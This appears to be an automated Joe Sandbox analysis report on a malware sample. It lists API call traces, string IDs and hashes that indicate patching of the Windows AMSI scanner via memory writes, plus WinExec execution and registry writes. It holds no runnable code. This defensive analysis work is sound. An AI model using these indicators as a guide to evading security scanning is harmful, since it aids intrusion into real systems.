                                                                      • Instruction Fuzzy Hash: B222FD74A0015D9FEF24FBA4DC95B8EB3BAEF85308F5041B1A008AB254DB31AE46DF55

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,02C91FC1), ref: 02C917D0
                                                                      • Sleep.KERNEL32(0000000A,00000000,?,02C91FC1), ref: 02C917E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: 54f7eac76745eb0b9cb60c6db6765ddb6bfcec31d9b166a77f3fd7623d43782d
                                                                      • Instruction ID: 21291ae2a4969e817bfefab096a4e408948cc9202870626fc5e44e624583a455
                                                                      • Opcode Fuzzy Hash: 54f7eac76745eb0b9cb60c6db6765ddb6bfcec31d9b166a77f3fd7623d43782d
                                                                      • Instruction Fuzzy Hash: EDB135B2A002429FCF16CF29D489355BBE1EF86315F1E86AED45D8B385C7B09952CBD0

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(amsi), ref: 02CA88C1
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02CA8920
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                      • String ID: DllGetClassObject$W$amsi
                                                                      • API String ID: 941070894-2671292670
                                                                      • Opcode ID: 9640848cb2b7bb8e9a8396396a5c789138823d0fcc3a8b577c2bf0db74b9fe0d
                                                                      • Instruction ID: b61e0d3af90759443a7c936b94b3f7df77141d61bbe2592703a5b813140f732d
                                                                      • Opcode Fuzzy Hash: 9640848cb2b7bb8e9a8396396a5c789138823d0fcc3a8b577c2bf0db74b9fe0d
                                                                      • Instruction Fuzzy Hash: CFF0AF6154C382BAE700E3748C59F4FBECD5B62268F048B18B1E8AA2D2D679D1049B77

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000,?,?,00000000,02C91FE4), ref: 02C91B17
                                                                      • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02C91FE4), ref: 02C91B31
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: c0b14390217a027b64d96cfb365a3eb66d46c88112b156eada6665d6b91a9096
                                                                      • Instruction ID: f10b81824797e86d704716db3fc59defab1a920b48f2555900383216b2fb2777
                                                                      • Opcode Fuzzy Hash: c0b14390217a027b64d96cfb365a3eb66d46c88112b156eada6665d6b91a9096
                                                                      • Instruction Fuzzy Hash: 2551C2B16412429FDF15CF68C98A756BBE1AF86314F1C85AED448CB382D7F0C946CB91

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckConnectionInternet
                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                      • API String ID: 3847983778-3852638603
                                                                      • Opcode ID: 75c5f3b28b2736a498f4033db959c429f6863ace0b706346b77984b29b15b915
                                                                      • Instruction ID: ce801dccaf0beaef6d11a4f49f3b7cf4226c9f794b94f16bcd0d5242180f32d9
                                                                      • Opcode Fuzzy Hash: 75c5f3b28b2736a498f4033db959c429f6863ace0b706346b77984b29b15b915
                                                                      • Instruction Fuzzy Hash: 48410C75B1010D9FEF24EBA8D855EDEB3BAEF88708F204835E041A7251DA70AD02DF95
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                      • String ID: Kernel32$WinExec
                                                                      • API String ID: 2292790416-3609268280
                                                                      • Opcode ID: 9d0a9b9c47fdc8b01f599689b3526c3313dee23b61f89cc4e0edc5de4126508f
                                                                      • Instruction ID: 5438314b02827fc991382d1040a0af273393a223d38dc9a5a0c9938e582668e4
                                                                      • Opcode Fuzzy Hash: 9d0a9b9c47fdc8b01f599689b3526c3313dee23b61f89cc4e0edc5de4126508f
                                                                      • Instruction Fuzzy Hash: EF018C74784205BFFB14EFA8DC21F5EB7EEEB09B04F514520B900D2B50D730AD12AA24
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • WinExec.KERNEL32(?,?), ref: 02CA8624
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$Exec
                                                                      • String ID: Kernel32$WinExec
                                                                      • API String ID: 2292790416-3609268280
                                                                      • Opcode ID: fdda31c21b79cf0f3a230a18154816f9cf4ad098edb5d4862612e6bac559fc16
                                                                      • Instruction ID: 5156e0a6bf450016b82ecb7fdb24d82172309c39cea9c24ffc97c911300ea186
                                                                      • Opcode Fuzzy Hash: fdda31c21b79cf0f3a230a18154816f9cf4ad098edb5d4862612e6bac559fc16
                                                                      • Instruction Fuzzy Hash: 5BF08C74684205BFFB14EFA8DC21F5EB7EEEB09B04F514520B900D2B50D730AD12AA24
                                                                      APIs
                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5C88
                                                                      • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5CB6
                                                                        • Part of subcall function 02C97D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02CA3900,02CA5CF6,00000000,02CA5D74,?,?,02CA3900), ref: 02C97DAA
                                                                        • Part of subcall function 02C97F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02CA3900,02CA5D11,00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02C97FB7
                                                                      • GetLastError.KERNEL32(00000000,02CA5D74,?,?,02CA3900,00000001), ref: 02CA5D1B
                                                                        • Part of subcall function 02C9A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02C9C3D9,00000000,02C9C433), ref: 02C9A797
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                      • String ID:
                                                                      • API String ID: 503785936-0
                                                                      • Opcode ID: 66f7260417fec3a22194d52c6d1010fbb75450e12f9c9b3f8b73907295bce040
                                                                      • Instruction ID: d8eb57903d6abc87bc6f1aa25806638d2541ac8ca973871861aaefedcb3399f0
                                                                      • Opcode Fuzzy Hash: 66f7260417fec3a22194d52c6d1010fbb75450e12f9c9b3f8b73907295bce040
                                                                      • Instruction Fuzzy Hash: E8319170E006499FDF00EFA8C999BDEBBF6AB48704F908065E504AB390D7755E05DFA1
                                                                      APIs
                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E0BA58), ref: 02CAF258
                                                                      • RegSetValueExA.ADVAPI32(00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF290
                                                                      • RegCloseKey.ADVAPI32(00000BF4,00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF29B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 779948276-0
                                                                      • Opcode ID: b17cc1dfb449c760ee1bcc07e592361677ea78422cb408098997258b7a8cd9e5
                                                                      • Instruction ID: e5a4f6ae5f64e3ec078b5258db7ee23097bb0c0c66022970265b18a62c89fc0b
                                                                      • Opcode Fuzzy Hash: b17cc1dfb449c760ee1bcc07e592361677ea78422cb408098997258b7a8cd9e5
                                                                      • Instruction Fuzzy Hash: 7A115871A40204AFEF14EFA9D895A9E77EDEB08308B414465B504D7650DA35EE82EF50
                                                                      APIs
                                                                      • RegOpenKeyA.ADVAPI32(?,00000000,02E0BA58), ref: 02CAF258
                                                                      • RegSetValueExA.ADVAPI32(00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF290
                                                                      • RegCloseKey.ADVAPI32(00000BF4,00000BF4,00000000,00000000,00000001,00000000,0000001C,00000000,02CAF2C3), ref: 02CAF29B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseOpenValue
                                                                      • String ID:
                                                                      • API String ID: 779948276-0
                                                                      • Opcode ID: 9837e0747cc41cdb383ad7503aafe0a9132f1203fa87a1aa9bed1fb3e3311007
                                                                      • Instruction ID: 617b7583bef40c4da0bef06ded863a133541ef5c967e2e0c76135f206742524c
                                                                      • Opcode Fuzzy Hash: 9837e0747cc41cdb383ad7503aafe0a9132f1203fa87a1aa9bed1fb3e3311007
                                                                      • Instruction Fuzzy Hash: DA115871A40204AFEF14EFA9D895A9E77ADEB08308B414465B504D7650DA35EA82EF50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ClearVariant
                                                                      • String ID:
                                                                      • API String ID: 1473721057-0
                                                                      • Opcode ID: 6880acbe9195adb00f874197dde1e4c0fb171a79f8a3f677dceed6f2f7f70997
                                                                      • Instruction ID: 4ee27cd9c8dff8383399bd790c41e161f2c6065e4c79884b704b418d0c52a969
                                                                      • Opcode Fuzzy Hash: 6880acbe9195adb00f874197dde1e4c0fb171a79f8a3f677dceed6f2f7f70997
                                                                      • Instruction Fuzzy Hash: EBF0AF35708110D79F24FB3ADC8C669279A7FA43407005437E80E9B211CB64CE85DBA2
                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 02C94D5B
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 02C94D6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: String$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 986138563-0
                                                                      • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                      • Instruction ID: bb898572b24b910852ba9efa4bd164a4b24dd4d8177a7882394f2cf918023d53
                                                                      • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                      • Instruction Fuzzy Hash: 70E012B9205A066EEF287F219D49B3B332AAFC2784B188499E800CA158D778D541FD38
                                                                      APIs
                                                                      • SysFreeString.OLEAUT32(?), ref: 02CA73DA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeString
                                                                      • String ID: H
                                                                      • API String ID: 3341692771-2852464175
                                                                      • Opcode ID: 9b48359d1732df687722d202faab27cdebe86e433f926cd380fe3d726a2b49f0
                                                                      • Instruction ID: 207be40b0e0eb205b4d3e091a40066edd35b7eb1a05f197c5964aacac872698c
                                                                      • Opcode Fuzzy Hash: 9b48359d1732df687722d202faab27cdebe86e433f926cd380fe3d726a2b49f0
                                                                      • Instruction Fuzzy Hash: F4B1E174A01609DFDB15CF99D490A9DFBF2FF89318F258169E909AB320D730A949CF50
                                                                      APIs
                                                                      • VariantCopy.OLEAUT32(00000000,00000000), ref: 02C9E781
                                                                        • Part of subcall function 02C9E364: VariantClear.OLEAUT32(?), ref: 02C9E373
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Variant$ClearCopy
                                                                      • String ID:
                                                                      • API String ID: 274517740-0
                                                                      • Opcode ID: a2bf8d49fc14a338ab841a22601a5210ecfd8d29bb5f4ede4053dee793198170
                                                                      • Instruction ID: a3e9b024ba49b717b3e8b29d96436c21630fc375d976fe01de2ef11f6fa7d4b0
                                                                      • Opcode Fuzzy Hash: a2bf8d49fc14a338ab841a22601a5210ecfd8d29bb5f4ede4053dee793198170
                                                                      • Instruction Fuzzy Hash: 6A11E570710210C7CF34EF6DC8CCAAA37DAAFA4751B009467E50A8B615DB31CC41EAA3
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitVariant
                                                                      • String ID:
                                                                      • API String ID: 1927566239-0
                                                                      • Opcode ID: 225397317a113d876d0f7095bb45c798ce4f68b2f9424edd836c550d9f2efff5
                                                                      • Instruction ID: 25553cf29f87da6975c82fde682e606d0c47810558deaeed2bbca60578c7ad8b
                                                                      • Opcode Fuzzy Hash: 225397317a113d876d0f7095bb45c798ce4f68b2f9424edd836c550d9f2efff5
                                                                      • Instruction Fuzzy Hash: 25315E72A00218EBEF11DFE9C88CAAA77E8EB5E704F444466F909D3250D334DA50CBA1
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                        • Part of subcall function 02CA8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA83C2), ref: 02CA83A4
                                                                      • FreeLibrary.KERNEL32(741D0000,00000000,00000000,00000000,00000000,02D1738C,Function_0000662C,00000004,02D1739C,02D1738C,05F5E103,00000040,02D173A0,741D0000,00000000,00000000), ref: 02CA8AAA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmpDownload File
